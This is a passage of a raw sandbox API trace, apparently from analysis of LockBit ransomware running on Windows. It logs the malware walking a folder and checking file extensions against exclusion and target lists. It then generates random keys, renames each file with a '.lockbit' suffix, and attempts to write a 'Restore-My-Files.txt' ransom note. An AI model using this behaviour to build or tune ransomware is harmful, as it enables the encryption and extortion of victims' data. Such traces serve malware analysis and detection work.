(lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.106] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.106] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02263_.WMF.lockbit") returned 72 [0177.106] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02263_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02263_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0177.107] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.107] malloc (_Size=0x40068) returned 0x1ff1e60 [0177.107] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2708) returned 1 [0177.107] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.108] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0177.108] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.108] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0177.108] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.112] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02263_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02263_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.112] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.112] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.113] free (_Block=0x1fa2ed8) [0177.113] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02263_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.113] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.113] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.113] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x325ae700, ftCreationTime.dwHighDateTime=0x1bd4bf9, ftLastAccessTime.dwLowDateTime=0x5aa8af30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x325ae700, ftLastWriteTime.dwHighDateTime=0x1bd4bf9, nFileSizeHigh=0x0, nFileSizeLow=0x38c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02265_.WMF", cAlternateFileName="")) returned 1 [0177.113] lstrcmpiW (lpString1=".", lpString2="SO02265_.WMF") returned -1 [0177.113] lstrcmpiW (lpString1="..", lpString2="SO02265_.WMF") returned -1 [0177.113] PathFindExtensionW (pszPath="SO02265_.WMF") returned=".WMF" [0177.113] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.113] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.113] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.113] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.113] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.113] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.113] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.113] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.114] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.114] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.115] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.115] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.115] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.115] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.115] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.115] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.115] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.115] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.115] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.115] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.115] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.115] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02265_.WMF") returned -1 [0177.115] lstrcmpiW (lpString1="ntldr", lpString2="SO02265_.WMF") returned -1 [0177.115] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02265_.WMF") returned -1 [0177.115] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02265_.WMF") returned -1 [0177.115] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02265_.WMF") returned -1 [0177.115] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02265_.WMF") returned 1 [0177.115] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02265_.WMF") returned -1 [0177.115] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.115] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02265_.WMF") returned=".WMF" [0177.115] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.115] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.115] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.115] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.115] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.116] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.116] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02265_.WMF.lockbit") returned 72 [0177.117] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02265_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02265_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0177.117] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.118] malloc (_Size=0x40068) returned 0x3df0008 [0177.118] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=908) returned 1 [0177.118] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.118] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0177.118] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.118] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0177.119] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.122] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02265_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02265_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.122] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.122] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.123] free (_Block=0x1fa2ed8) [0177.123] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02265_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.123] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.123] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.124] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e16ea00, ftCreationTime.dwHighDateTime=0x1bd4bf9, ftLastAccessTime.dwLowDateTime=0x6d358650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e16ea00, ftLastWriteTime.dwHighDateTime=0x1bd4bf9, nFileSizeHigh=0x0, nFileSizeLow=0x61c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02268_.WMF", cAlternateFileName="")) returned 1 [0177.124] lstrcmpiW (lpString1=".", lpString2="SO02268_.WMF") returned -1 [0177.124] lstrcmpiW (lpString1="..", lpString2="SO02268_.WMF") returned -1 [0177.124] PathFindExtensionW (pszPath="SO02268_.WMF") returned=".WMF" [0177.124] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.124] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.125] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.125] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02268_.WMF") returned -1 [0177.125] lstrcmpiW (lpString1="ntldr", lpString2="SO02268_.WMF") returned -1 [0177.125] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02268_.WMF") returned -1 [0177.125] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02268_.WMF") returned -1 [0177.125] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02268_.WMF") returned -1 [0177.125] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02268_.WMF") returned 1 [0177.125] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02268_.WMF") returned -1 [0177.126] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.126] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02268_.WMF") returned=".WMF" [0177.126] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.126] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.126] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.127] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.127] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.127] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.127] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.127] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02268_.WMF.lockbit") returned 72 [0177.127] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02268_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02268_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0177.128] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.128] malloc (_Size=0x40068) returned 0x1ff1e60 [0177.128] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1564) returned 1 [0177.128] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.129] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0177.129] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.129] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0177.129] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.133] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02268_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02268_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.133] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.133] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.134] free (_Block=0x1fa2ed8) [0177.134] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02268_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.134] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.134] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.134] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a836300, ftCreationTime.dwHighDateTime=0x1bd4bf9, ftLastAccessTime.dwLowDateTime=0x6d358650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1a836300, ftLastWriteTime.dwHighDateTime=0x1bd4bf9, nFileSizeHigh=0x0, nFileSizeLow=0xaf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02269_.WMF", cAlternateFileName="")) returned 1 [0177.134] lstrcmpiW (lpString1=".", lpString2="SO02269_.WMF") returned -1 [0177.134] lstrcmpiW (lpString1="..", lpString2="SO02269_.WMF") returned -1 [0177.134] PathFindExtensionW (pszPath="SO02269_.WMF") returned=".WMF" [0177.135] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.135] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.135] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.136] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.136] lstrcmpiW (lpString1=".msc", 